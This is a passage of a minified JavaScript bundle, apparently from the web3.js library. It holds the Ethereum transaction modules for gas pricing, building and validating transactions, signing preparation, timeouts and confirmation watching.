                            n = new i.TransactionRevertWithCustomError(e.reason, e.customErrorName, e.customErrorDecodedSignature, e.customErrorArguments, e.signature, r, e.data);
                        } else n = new i.TransactionRevertInstructionError(c.reason, c.signature, r, c.data);
                        return n;
                    });
                };
            },
            8736: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.getTransactionGasPricing = void 0;
                const i = r(7345), o = r(5071), s = r(9634), a = r(3222), u = r(223);
                t.getTransactionGasPricing = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        const c = (0, u.getTransactionType)(e, t);
                        if (!(0, i.isNullish)(c)) {
                            if (c.startsWith("-")) throw new o.UnsupportedTransactionTypeError(c);
                            if (c < "0x0" || c > "0x7f") throw new o.UnsupportedTransactionTypeError(c);
                            if ((0, i.isNullish)(e.gasPrice) && ("0x0" === c || "0x1" === c)) return {
                                gasPrice: yield (0, a.getGasPrice)(t, r),
                                maxPriorityFeePerGas: void 0,
                                maxFeePerGas: void 0
                            };
                            if ("0x2" === c) return Object.assign({
                                gasPrice: void 0
                            }, (yield function(e, t, r) {
                                var u, c, l;
                                return n(this, void 0, void 0, function*() {
                                    const n = yield (0, a.getBlock)(t, t.defaultBlock, !1, r);
                                    if ((0, i.isNullish)(n.baseFeePerGas)) throw new o.Eip1559NotSupportedError;
                                    if (!(0, i.isNullish)(e.gasPrice)) {
                                        const t = (0, s.format)({
                                            format: "uint"
                                        }, e.gasPrice, r);
                                        return {
                                            maxPriorityFeePerGas: t,
                                            maxFeePerGas: t
                                        };
                                    }
                                    return {
                                        maxPriorityFeePerGas: (0, s.format)({
                                            format: "uint"
                                        }, null !== (u = e.maxPriorityFeePerGas) && void 0 !== u ? u : t.defaultMaxPriorityFeePerGas, r),
                                        maxFeePerGas: (0, s.format)({
                                            format: "uint"
                                        }, null !== (c = e.maxFeePerGas) && void 0 !== c ? c : BigInt(n.baseFeePerGas) * BigInt(2) + BigInt(null !== (l = e.maxPriorityFeePerGas) && void 0 !== l ? l : t.defaultMaxPriorityFeePerGas), r)
                                    };
                                });
                            }(e, t, r)));
                        }
                    });
                };
            },
            1258: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.prepareTransactionForSigning = void 0;
                const i = r(9970), o = r(9634), s = r(9247), a = r(7345), u = r(8650), c = r(5140), l = r(223);
                t.prepareTransactionForSigning = (e, t, r, d = !1)=>n(void 0, void 0, void 0, function*() {
                        const n = yield (0, l.transactionBuilder)({
                            transaction: e,
                            web3Context: t,
                            privateKey: r,
                            fillGasPrice: d
                        }), h = (0, c.formatTransaction)(n, i.ETH_DATA_FORMAT);
                        return (0, u.validateTransactionForSigning)(h), s.TransactionFactory.fromTxData(((e)=>{
                            var t;
                            return {
                                nonce: e.nonce,
                                gasPrice: e.gasPrice,
                                gasLimit: null !== (t = e.gasLimit) && void 0 !== t ? t : e.gas,
                                to: e.to,
                                value: e.value,
                                data: e.input,
                                type: e.type,
                                chainId: e.chainId,
                                accessList: e.accessList,
                                maxPriorityFeePerGas: e.maxPriorityFeePerGas,
                                maxFeePerGas: e.maxFeePerGas
                            };
                        })(h), ((e, t)=>{
                            var r, n, i, u, c, l, d, h, f, p, m, g, y, v, b, E, A, _;
                            let w;
                            if (((0, a.isNullish)(e.chain) || (0, a.isNullish)(e.hardfork)) && (0, a.isNullish)(e.common)) t.defaultCommon ? (w = t.defaultCommon, (0, a.isNullish)(w.hardfork) && (w.hardfork = null !== (r = e.hardfork) && void 0 !== r ? r : t.defaultHardfork), (0, a.isNullish)(w.baseChain) && (w.baseChain = t.defaultChain)) : w = s.Common.custom({
                                name: "custom-network",
                                chainId: (0, o.toNumber)(e.chainId),
                                networkId: (0, a.isNullish)(e.networkId) ? void 0 : (0, o.toNumber)(e.networkId),
                                defaultHardfork: null !== (n = e.hardfork) && void 0 !== n ? n : t.defaultHardfork
                            }, {
                                baseChain: t.defaultChain
                            });
                            else {
                                const r = null !== (l = null !== (c = null === (u = null === (i = null == e ? void 0 : e.common) || void 0 === i ? void 0 : i.customChain) || void 0 === u ? void 0 : u.name) && void 0 !== c ? c : e.chain) && void 0 !== l ? l : "custom-network", n = (0, o.toNumber)(null !== (f = null === (h = null === (d = null == e ? void 0 : e.common) || void 0 === d ? void 0 : d.customChain) || void 0 === h ? void 0 : h.chainId) && void 0 !== f ? f : null == e ? void 0 : e.chainId), a = (0, o.toNumber)(null !== (g = null === (m = null === (p = null == e ? void 0 : e.common) || void 0 === p ? void 0 : p.customChain) || void 0 === m ? void 0 : m.networkId) && void 0 !== g ? g : null == e ? void 0 : e.networkId), T = null !== (b = null !== (v = null === (y = null == e ? void 0 : e.common) || void 0 === y ? void 0 : y.hardfork) && void 0 !== v ? v : null == e ? void 0 : e.hardfork) && void 0 !== b ? b : t.defaultHardfork, R = null !== (_ = null !== (A = null === (E = e.common) || void 0 === E ? void 0 : E.baseChain) && void 0 !== A ? A : e.chain) && void 0 !== _ ? _ : t.defaultChain;
                                n && a && r && (w = s.Common.custom({
                                    name: r,
                                    chainId: n,
                                    networkId: a,
                                    defaultHardfork: T
                                }, {
                                    baseChain: R
                                }));
                            }
                            return {
                                common: w
                            };
                        })(h, t));
                    });
            },
            4659: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.rejectIfBlockTimeout = void 0;
                const i = r(9634), o = r(5071), s = r(9326), a = r(3222);
                function u(e, t, r) {
                    const u = e.transactionPollingInterval, [c, l] = (0, i.rejectIfConditionAtInterval)(()=>n(this, void 0, void 0, function*() {
                            let n;
                            try {
                                n = yield (0, a.getBlockNumber)(e, s.NUMBER_DATA_FORMAT);
                            } catch (e) {
                                return void console.warn("An error happen while trying to get the block number", e);
                            }
                            const i = n - t;
                            if (i >= e.transactionBlockTimeout) return new o.TransactionBlockTimeoutError({
                                starterBlockNumber: t,
                                numberOfBlocks: i,
                                transactionHash: r
                            });
                        }), u);
                    return [
                        l,
                        {
                            clean: ()=>{
                                clearInterval(c);
                            }
                        }
                    ];
                }
                t.rejectIfBlockTimeout = function(e, t) {
                    var r, i;
                    return n(this, void 0, void 0, function*() {
                        const { provider: c } = e.requestManager;
                        let l;
                        const d = yield (0, a.getBlockNumber)(e, s.NUMBER_DATA_FORMAT);
                        return l = (null === (i = (r = c).supportsSubscriptions) || void 0 === i ? void 0 : i.call(r)) && e.enableExperimentalFeatures.useSubscriptionWhenCheckingBlockTimeout ? yield function(e, t, r) {
                            var i;
                            return n(this, void 0, void 0, function*() {
                                let n, s, a = !0;
                                function c(n, i) {
                                    i && console.warn("error happened at subscription. So revert to polling...", i), s.clean(), a = !1;
                                    const [o, c] = u(e, t, r);
                                    s.clean = c.clean, o.catch((e)=>n(e));
                                }
                                try {
                                    n = yield null === (i = e.subscriptionManager) || void 0 === i ? void 0 : i.subscribe("newHeads"), s = {
                                        clean: ()=>{
                                            var t;
                                            n.id && (null === (t = e.subscriptionManager) || void 0 === t || t.removeSubscription(n).then(()=>{}).catch(()=>{}));
                                        }
                                    };
                                } catch (n) {
                                    return u(e, t, r);
                                }
                                return [
                                    new Promise((i, s)=>{
                                        try {
                                            n.on("data", (n)=>{
                                                if (a = !1, !(null == n ? void 0 : n.number)) return;
                                                const i = Number(BigInt(n.number) - BigInt(t));
                                                i >= e.transactionBlockTimeout && s(new o.TransactionBlockTimeoutError({
                                                    starterBlockNumber: t,
                                                    numberOfBlocks: i,
                                                    transactionHash: r
                                                }));
                                            }), n.on("error", (e)=>{
                                                c(s, e);
                                            });
                                        } catch (e) {
                                            c(s, e);
                                        }
                                        setTimeout(()=>{
                                            a && c(s);
                                        }, 1e3 * e.blockHeaderTimeout);
                                    }),
                                    s
                                ];
                            });
                        }(e, d, t) : u(e, d, t), l;
                    });
                };
            },
            223: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.transactionBuilder = t.defaultTransactionBuilder = t.getTransactionType = t.getTransactionNonce = t.getTransactionFromOrToAttr = void 0;
                const i = r(9970), o = r(9247), s = r(9820), a = r(7345), u = r(5071), c = r(9634), l = r(9326), d = r(3222), h = r(7350), f = r(1922), p = r(8736);
                function m(e) {
                    var r, o;
                    return n(this, void 0, void 0, function*() {
                        let n = (0, c.format)(f.transactionSchema, e.transaction, i.DEFAULT_RETURN_FORMAT);
                        if ((0, a.isNullish)(n.from) && (n.from = (0, t.getTransactionFromOrToAttr)("from", e.web3Context, void 0, e.privateKey)), (0, a.isNullish)(n.nonce) && (n.nonce = yield (0, t.getTransactionNonce)(e.web3Context, n.from, i.ETH_DATA_FORMAT)), (0, a.isNullish)(n.value) && (n.value = "0x"), (0, a.isNullish)(n.data)) (0, a.isNullish)(n.input) ? (n.input = "0x", n.data = "0x") : (n.input.startsWith("0x") || (n.input = `0x${n.input}`), n.data = n.input);
                        else {
                            if (!(0, a.isNullish)(n.input) && n.data !== n.input) throw new u.TransactionDataAndInputError({
                                data: (0, c.bytesToHex)(n.data),
                                input: (0, c.bytesToHex)(n.input)
                            });
                            n.data.startsWith("0x") || (n.data = `0x${n.data}`), n.input = n.data;
                        }
                        if ((0, a.isNullish)(n.common)) {
                            if (e.web3Context.defaultCommon) {
                                const t = e.web3Context.defaultCommon, r = t.customChain.chainId, i = t.customChain.networkId, o = t.customChain.name;
                                n.common = Object.assign(Object.assign({}, t), {
                                    customChain: {
                                        chainId: r,
                                        networkId: i,
                                        name: o
                                    }
                                });
                            }
                            (0, a.isNullish)(n.chain) && (n.chain = e.web3Context.defaultChain), (0, a.isNullish)(n.hardfork) && (n.hardfork = e.web3Context.defaultHardfork);
                        }
                        return (0, a.isNullish)(n.chainId) && (0, a.isNullish)(null === (r = n.common) || void 0 === r ? void 0 : r.customChain.chainId) && (n.chainId = yield (0, d.getChainId)(e.web3Context, i.ETH_DATA_FORMAT)), (0, a.isNullish)(n.networkId) && (n.networkId = null !== (o = e.web3Context.defaultNetworkId) && void 0 !== o ? o : yield (0, s.getId)(e.web3Context, i.ETH_DATA_FORMAT)), (0, a.isNullish)(n.gasLimit) && !(0, a.isNullish)(n.gas) && (n.gasLimit = n.gas), n.type = (0, t.getTransactionType)(n, e.web3Context), !(0, a.isNullish)(n.accessList) || "0x1" !== n.type && "0x2" !== n.type || (n.accessList = []), e.fillGasPrice && (n = Object.assign(Object.assign({}, n), (yield (0, p.getTransactionGasPricing)(n, e.web3Context, i.ETH_DATA_FORMAT)))), n;
                    });
                }
                t.getTransactionFromOrToAttr = (e, t, r, n)=>{
                    if (void 0 !== r && e in r && void 0 !== r[e]) {
                        if ("string" == typeof r[e] && (0, a.isAddress)(r[e])) return r[e];
                        if (!(0, a.isHexStrict)(r[e]) && (0, a.isNumber)(r[e])) {
                            if (t.wallet) {
                                const n = t.wallet.get((0, c.format)({
                                    format: "uint"
                                }, r[e], l.NUMBER_DATA_FORMAT));
                                if (!(0, a.isNullish)(n)) return n.address;
                                throw new u.LocalWalletNotAvailableError;
                            }
                            throw new u.LocalWalletNotAvailableError;
                        }
                        throw "from" === e ? new u.InvalidTransactionWithSender(r.from) : new u.InvalidTransactionWithReceiver(r.to);
                    }
                    if ("from" === e) {
                        if (!(0, a.isNullish)(n)) return (0, o.privateKeyToAddress)(n);
                        if (!(0, a.isNullish)(t.defaultAccount)) return t.defaultAccount;
                    }
                }, t.getTransactionNonce = (e, t, r = i.DEFAULT_RETURN_FORMAT)=>n(void 0, void 0, void 0, function*() {
                        if ((0, a.isNullish)(t)) throw new u.UnableToPopulateNonceError;
                        return (0, d.getTransactionCount)(e, t, e.defaultBlock, r);
                    }), t.getTransactionType = (e, t)=>{
                    const r = (0, h.detectTransactionType)(e, t);
                    return (0, a.isNullish)(r) ? (0, a.isNullish)(t.defaultTransactionType) ? void 0 : (0, c.format)({
                        format: "uint"
                    }, t.defaultTransactionType, i.ETH_DATA_FORMAT) : r;
                }, t.defaultTransactionBuilder = m, t.transactionBuilder = (e)=>n(void 0, void 0, void 0, function*() {
                        var t;
                        return (null !== (t = e.web3Context.transactionBuilder) && void 0 !== t ? t : m)(Object.assign(Object.assign({}, e), {
                            transaction: e.transaction
                        }));
                    });
            },
            8425: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.trySendTransaction = void 0;
                const i = r(9634), o = r(5071), s = r(4659);
                t.trySendTransaction = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        const [n, a] = (0, i.rejectIfTimeout)(e.transactionSendTimeout, new o.TransactionSendTimeoutError({
                            numberOfSeconds: e.transactionSendTimeout / 1e3,
                            transactionHash: r
                        })), [u, c] = yield (0, s.rejectIfBlockTimeout)(e, r);
                        try {
                            return yield Promise.race([
                                t(),
                                a,
                                u
                            ]);
                        } finally{
                            clearTimeout(n), c.clean();
                        }
                    });
                };
            },
            4745: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.waitForTransactionReceipt = void 0;
                const i = r(5071), o = r(9634), s = r(4659), a = r(3222);
                t.waitForTransactionReceipt = function(e, t, r) {
                    var u;
                    return n(this, void 0, void 0, function*() {
                        const c = null !== (u = e.transactionReceiptPollingInterval) && void 0 !== u ? u : e.transactionPollingInterval, l = (0, o.pollTillDefined)(()=>n(this, void 0, void 0, function*() {
                                try {
                                    return (0, a.getTransactionReceipt)(e, t, r);
                                } catch (e) {
                                    return void console.warn("An error happen while trying to get the transaction receipt", e);
                                }
                            }), c), [d, h] = (0, o.rejectIfTimeout)(e.transactionPollingTimeout, new i.TransactionPollingTimeoutError({
                            numberOfSeconds: e.transactionPollingTimeout / 1e3,
                            transactionHash: t
                        })), [f, p] = yield (0, s.rejectIfBlockTimeout)(e, t);
                        try {
                            return yield Promise.race([
                                l,
                                h,
                                f
                            ]);
                        } finally{
                            clearTimeout(d), p.clean();
                        }
                    });
                };
            },
            8002: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.watchTransactionByPolling = void 0;
                const i = r(9634), o = r(1181), s = r(1922);
                t.watchTransactionByPolling = ({ web3Context: e, transactionReceipt: t, transactionPromiEvent: r, returnFormat: a })=>{
                    var u;
                    let c = 1;
                    const l = setInterval(()=>{
                        n(void 0, void 0, void 0, function*() {
                            c >= e.transactionConfirmationBlocks && clearInterval(l);
                            const n = yield o.ethRpcMethods.getBlockByNumber(e.requestManager, (0, i.numberToHex)(BigInt(t.blockNumber) + BigInt(c)), !1);
                            (null == n ? void 0 : n.hash) && (c += 1, r.emit("confirmation", {
                                confirmations: (0, i.format)({
                                    format: "uint"
                                }, c, a),
                                receipt: (0, i.format)(s.transactionReceiptSchema, t, a),
                                latestBlockHash: (0, i.format)({
                                    format: "bytes32"
                                }, n.hash, a)
                            }));
                        });
                    }, null !== (u = e.transactionReceiptPollingInterval) && void 0 !== u ? u : e.transactionPollingInterval);
                };
            },
            2539: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.watchTransactionBySubscription = void 0;
                const i = r(9634), o = r(1922), s = r(8002);
                t.watchTransactionBySubscription = ({ web3Context: e, transactionReceipt: t, transactionPromiEvent: r, returnFormat: a })=>{
                    let u, c = !0;
                    setImmediate(()=>{
                        var l;
                        null === (l = e.subscriptionManager) || void 0 === l || l.subscribe("newHeads").then((l)=>{
                            l.on("data", (s)=>n(void 0, void 0, void 0, function*() {
                                    var n;
                                    if (c = !1, !(null == s ? void 0 : s.number) || u === (null == s ? void 0 : s.parentHash)) return;
                                    u = null == s ? void 0 : s.parentHash;
                                    const d = BigInt(s.number) - BigInt(t.blockNumber) + BigInt(1);
                                    r.emit("confirmation", {
                                        confirmations: (0, i.format)({
                                            format: "uint"
                                        }, d, a),
                                        receipt: (0, i.format)(o.transactionReceiptSchema, t, a),
                                        latestBlockHash: (0, i.format)({
                                            format: "bytes32"
                                        }, s.parentHash, a)
                                    }), d >= e.transactionConfirmationBlocks && (yield null === (n = e.subscriptionManager) || void 0 === n ? void 0 : n.removeSubscription(l));
                                })), l.on("error", ()=>n(void 0, void 0, void 0, function*() {
                                    var n;
                                    yield null === (n = e.subscriptionManager) || void 0 === n ? void 0 : n.removeSubscription(l), c = !1, (0, s.watchTransactionByPolling)({
                                        web3Context: e,
                                        transactionReceipt: t,
                                        transactionPromiEvent: r,
                                        returnFormat: a
                                    });
                                }));
                        }).catch(()=>{
                            c = !1, (0, s.watchTransactionByPolling)({
                                web3Context: e,
                                transactionReceipt: t,
                                transactionPromiEvent: r,
                                returnFormat: a
                            });
                        });
                    }), setTimeout(()=>{
                        c && (0, s.watchTransactionByPolling)({
                            web3Context: e,
                            transactionReceipt: t,
                            transactionPromiEvent: r,
                            returnFormat: a
                        });
                    }, 1e3 * e.blockHeaderTimeout);
                };
            },
            2117: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.watchTransactionForConfirmations = void 0;
                const n = r(9634), i = r(7345), o = r(5071), s = r(1922), a = r(8002), u = r(2539);
                t.watchTransactionForConfirmations = function(e, t, r, c, l) {
                    if ((0, i.isNullish)(r) || (0, i.isNullish)(r.blockHash)) throw new o.TransactionMissingReceiptOrBlockHashError({
                        receipt: r,
                        blockHash: (0, n.format)({
                            format: "bytes32"
                        }, null == r ? void 0 : r.blockHash, l),
                        transactionHash: (0, n.format)({
                            format: "bytes32"
                        }, c, l)
                    });
                    if (!r.blockNumber) throw new o.TransactionReceiptMissingBlockNumberError({
                        receipt: r
                    });
                    t.emit("confirmation", {
                        confirmations: (0, n.format)({
                            format: "uint"
                        }, 1, l),
                        receipt: (0, n.format)(s.transactionReceiptSchema, r, l),
                        latestBlockHash: (0, n.format)({
                            format: "bytes32"
                        }, r.blockHash, l)
                    }), e.requestManager.provider.supportsSubscriptions() ? (0, u.watchTransactionBySubscription)({
                        web3Context: e,
                        transactionReceipt: r,
                        transactionPromiEvent: t,
                        returnFormat: l
                    }) : (0, a.watchTransactionByPolling)({
                        web3Context: e,
                        transactionReceipt: r,
                        transactionPromiEvent: t,
                        returnFormat: l
                    });
                };
            },
            8650: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.validateTransactionForSigning = t.validateGas = t.validateFeeMarketGas = t.validateLegacyGas = t.validateHardfork = t.validateBaseChain = t.validateChainInfo = t.validateCustomChainInfo = t.validateTransactionCall = t.isTransactionCall = t.validateTransactionWithSender = t.isTransactionWithSender = t.isTransactionLegacyUnsigned = t.isTransaction2930Unsigned = t.isTransaction1559Unsigned = t.isAccessList = t.isAccessListEntry = t.isBaseTransaction = void 0;
                const n = r(9970), i = r(7345), o = r(5071), s = r(5140);
                function a(e) {
                    return !(!(0, i.isNullish)(e.to) && !(0, i.isAddress)(e.to) || !(0, i.isHexStrict)(e.type) && !(0, i.isNullish)(e.type) && 2 !== e.type.length || !(0, i.isHexStrict)(e.nonce) || !(0, i.isHexStrict)(e.gas) || !(0, i.isHexStrict)(e.value) || !(0, i.isHexStrict)(e.input) || e.chainId && !(0, i.isHexStrict)(e.chainId));
                }
                function u(e) {
                    return !(!(0, i.isNullish)(e.address) && !(0, i.isAddress)(e.address) || !(0, i.isNullish)(e.storageKeys) && !e.storageKeys.every((e)=>(0, i.isHexString32Bytes)(e)));
                }
                function c(e) {
                    return !(!Array.isArray(e) || !e.every((e)=>u(e)));
                }
                function l(e) {
                    return !!(a(e) && (0, i.isHexStrict)(e.maxFeePerGas) && (0, i.isHexStrict)(e.maxPriorityFeePerGas) && c(e.accessList));
                }
                function d(e) {
                    return !!a(e) && !!(0, i.isHexStrict)(e.gasPrice) && !!c(e.accessList);
                }
                function h(e) {
                    return !!a(e) && !!(0, i.isHexStrict)(e.gasPrice);
                }
                function f(e) {
                    return !!(0, i.isAddress)(e.from) && !!a(e) && !!(l(e) || d(e) || h(e));
                }
                function p(e) {
                    return !(!(0, i.isNullish)(e.from) && !(0, i.isAddress)(e.from) || !(0, i.isAddress)(e.to) || !(0, i.isNullish)(e.gas) && !(0, i.isHexStrict)(e.gas) || !(0, i.isNullish)(e.gasPrice) && !(0, i.isHexStrict)(e.gasPrice) || !(0, i.isNullish)(e.value) && !(0, i.isHexStrict)(e.value) || !(0, i.isNullish)(e.data) && !(0, i.isHexStrict)(e.data) || !(0, i.isNullish)(e.input) && !(0, i.isHexStrict)(e.input) || !(0, i.isNullish)(e.type) || l(e) || d(e));
                }
                t.isBaseTransaction = a, t.isAccessListEntry = u, t.isAccessList = c, t.isTransaction1559Unsigned = l, t.isTransaction2930Unsigned = d, t.isTransactionLegacyUnsigned = h, t.isTransactionWithSender = f, t.validateTransactionWithSender = function(e) {
                    if (!f(e)) throw new o.InvalidTransactionWithSender(e);
                }, t.isTransactionCall = p, t.validateTransactionCall = function(e) {
                    if (!p(e)) throw new o.InvalidTransactionCall(e);
                }, t.validateCustomChainInfo = (e)=>{
                    if (!(0, i.isNullish)(e.common)) {
                        if ((0, i.isNullish)(e.common.customChain)) throw new o.MissingCustomChainError;
                        if ((0, i.isNullish)(e.common.customChain.chainId)) throw new o.MissingCustomChainIdError;
                        if (!(0, i.isNullish)(e.chainId) && e.chainId !== e.common.customChain.chainId) throw new o.ChainIdMismatchError({
                            txChainId: e.chainId,
                            customChainId: e.common.customChain.chainId
                        });
                    }
                }, t.validateChainInfo = (e)=>{
                    if (!(0, i.isNullish)(e.common) && !(0, i.isNullish)(e.chain) && !(0, i.isNullish)(e.hardfork)) throw new o.CommonOrChainAndHardforkError;
                    if (!(0, i.isNullish)(e.chain) && (0, i.isNullish)(e.hardfork) || !(0, i.isNullish)(e.hardfork) && (0, i.isNullish)(e.chain)) throw new o.MissingChainOrHardforkError({
                        chain: e.chain,
                        hardfork: e.hardfork
                    });
                }, t.validateBaseChain = (e)=>{
                    if (!(0, i.isNullish)(e.common) && !(0, i.isNullish)(e.common.baseChain) && !(0, i.isNullish)(e.chain) && e.chain !== e.common.baseChain) throw new o.ChainMismatchError({
                        txChain: e.chain,
                        baseChain: e.common.baseChain
                    });
                }, t.validateHardfork = (e)=>{
                    if (!(0, i.isNullish)(e.common) && !(0, i.isNullish)(e.common.hardfork) && !(0, i.isNullish)(e.hardfork) && e.hardfork !== e.common.hardfork) throw new o.HardforkMismatchError({
                        txHardfork: e.hardfork,
                        commonHardfork: e.common.hardfork
                    });
                }, t.validateLegacyGas = (e)=>{
                    if ((0, i.isNullish)(e.gas) || !(0, i.isUInt)(e.gas) || (0, i.isNullish)(e.gasPrice) || !(0, i.isUInt)(e.gasPrice)) throw new o.InvalidGasOrGasPrice({
                        gas: e.gas,
                        gasPrice: e.gasPrice
                    });
                    if (!(0, i.isNullish)(e.maxFeePerGas) || !(0, i.isNullish)(e.maxPriorityFeePerGas)) throw new o.UnsupportedFeeMarketError({
                        maxFeePerGas: e.maxFeePerGas,
                        maxPriorityFeePerGas: e.maxPriorityFeePerGas
                    });
                }, t.validateFeeMarketGas = (e)=>{
                    if (!(0, i.isNullish)(e.gasPrice) && "0x2" === e.type) throw new o.Eip1559GasPriceError(e.gasPrice);
                    if ("0x0" === e.type || "0x1" === e.type) throw new o.UnsupportedFeeMarketError({
                        maxFeePerGas: e.maxFeePerGas,
                        maxPriorityFeePerGas: e.maxPriorityFeePerGas
                    });
                    if ((0, i.isNullish)(e.maxFeePerGas) || !(0, i.isUInt)(e.maxFeePerGas) || (0, i.isNullish)(e.maxPriorityFeePerGas) || !(0, i.isUInt)(e.maxPriorityFeePerGas)) throw new o.InvalidMaxPriorityFeePerGasOrMaxFeePerGas({
                        maxPriorityFeePerGas: e.maxPriorityFeePerGas,
                        maxFeePerGas: e.maxFeePerGas
                    });
                }, t.validateGas = (e)=>{
                    const r = !(0, i.isNullish)(e.gas) || !(0, i.isNullish)(e.gasLimit), n = r && !(0, i.isNullish)(e.gasPrice), s = r && !(0, i.isNullish)(e.maxPriorityFeePerGas) && !(0, i.isNullish)(e.maxFeePerGas);
                    if (!n && !s) throw new o.MissingGasError({
                        gas: e.gas,
                        gasPrice: e.gasPrice,
                        maxPriorityFeePerGas: e.maxPriorityFeePerGas,
                        maxFeePerGas: e.maxFeePerGas
                    });
                    if (n && s) throw new o.TransactionGasMismatchError({
                        gas: e.gas,
                        gasPrice: e.gasPrice,
                        maxPriorityFeePerGas: e.maxPriorityFeePerGas,
                        maxFeePerGas: e.maxFeePerGas
                    });
                    (n ? t.validateLegacyGas : t.validateFeeMarketGas)(e), (!(0, i.isNullish)(e.type) && e.type > "0x1" ? t.validateFeeMarketGas : t.validateLegacyGas)(e);
                }, t.validateTransactionForSigning = (e, r)=>{
                    if (!(0, i.isNullish)(r)) return void r(e);
                    if ("object" != typeof e || (0, i.isNullish)(e)) throw new o.InvalidTransactionObjectError(e);
                    (0, t.validateCustomChainInfo)(e), (0, t.validateChainInfo)(e), (0, t.validateBaseChain)(e), (0, t.validateHardfork)(e);
                    const a = (0, s.formatTransaction)(e, n.ETH_DATA_FORMAT);
                    if ((0, t.validateGas)(a), (0, i.isNullish)(a.nonce) || (0, i.isNullish)(a.chainId) || a.nonce.startsWith("-") || a.chainId.startsWith("-")) throw new o.InvalidNonceOrChainIdError({
                        nonce: e.nonce,
                        chainId: e.chainId
                    });
                };
            },
            1435: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
